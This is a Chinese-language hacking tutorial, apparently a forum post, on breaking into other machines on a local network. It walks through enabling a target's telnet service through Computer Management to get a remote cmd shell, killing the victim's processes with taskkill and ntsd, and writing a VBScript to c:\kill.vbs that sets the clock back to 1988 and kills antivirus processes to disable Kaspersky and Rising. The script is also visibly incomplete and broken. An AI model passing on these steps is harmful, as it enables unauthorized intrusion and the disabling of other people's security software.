3年前我用的東西了， 可能大家比較老了， 不過也許現在還是能用上的， 不過大家不妨試驗一下很有趣的。

　　點我的電腦右鍵單機管理， 然后點操作底下的=》連接到另外一個計算機。 輸入對方ip

　　或者你不知道對方ip 可以這樣， 點瀏覽高級里的立即查找， 就可以顯示本局域網工作組內的計算機了。 然后雙擊你要進入的電腦， 呵呵一般局域網的計算機密碼是一樣的， 所以不需要NTLM驗證， 不過那個驗證比較老了， 現在不知道還有沒有人會用， 進入后然后點服務和應用， 找到telnet服務， 然后開啟對方telnet服務， 如果沒有進入這些界面或者服務出錯是因為對方沒有開rpc服務， 當然還是選擇放棄吧， 如果按照剛才步驟成功， 那恭喜你已經得到一個進入對方計算機的通道了。

　　然后在cmd底下輸入 telnet 對方ip地址 就會顯示對方的一個cmdshell了， 當然這里有個小技巧， 如果你不知道對方ip怎么辦。 很簡單cmd下輸入net view 可以查看到局域網計算機名， 然后點鼠標右鍵 標記你要的計算機名字選中 按下回車就復制到cmd的剪切板里了， 然后用ping命令 ping 粘貼你剛才復制的內容（直接點右鍵就出來了） 然后就能看到你ping的ip了。

　　進入對方計算機該后該怎么做呢。 呵呵 很多黑客教程好像沒有具體告訴我們下一步我們該怎么辦吧 嘿嘿。

　　發揮你的想象， 把對方電腦就當成你本機一樣去對待， 比如你想查看對方進程。

　　cmd 下輸入 tasklist

　　進程太多看不完怎么辦 tasklist more

　　想殺掉他的進程怎么辦？

　　taskkill /f /im 進程名字 /t 如關qq taskkill /f /im qq.exe /t

　　或者有的用ntsd殺進程

　　ntsd -c q -p PID

　　PID是用他是用tasklist就可以看到的對照相應的PID就能殺進程

　　如果多次查殺對方進程不成功是什么原因， 很可能對方有殺毒軟件或者防火墻

　　怎么去殺掉卡巴這些進程呢？

　　這里有一個腳本

　　Set ws = CreateObject（"Wscript.Shell"）

　　ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide

　　for each ps in getobject（"winmgmts:\\.\root\cimv2:win32_proCESs"）.instances_

　　if ps.Name="rfwsrv.exe" then

　　ws.run "ntsd -c q -p ps.handle",0

　　我們可以這樣去做 echo 加上面的每一行腳本代碼>>c:\kill.vbs

　　最后在運行這個腳本 就可以了。 呵呵

　　也可以你覺得麻煩直接輸入 date 然后加日期修改成1988年左右就行了 卡巴就失效了

　　瑞星的原理也是taskkill掉了rfwsrv.exe這個進程使殺毒軟件失效。

　　其他的就不用我說了自己研究點dos命令就可以搞定了。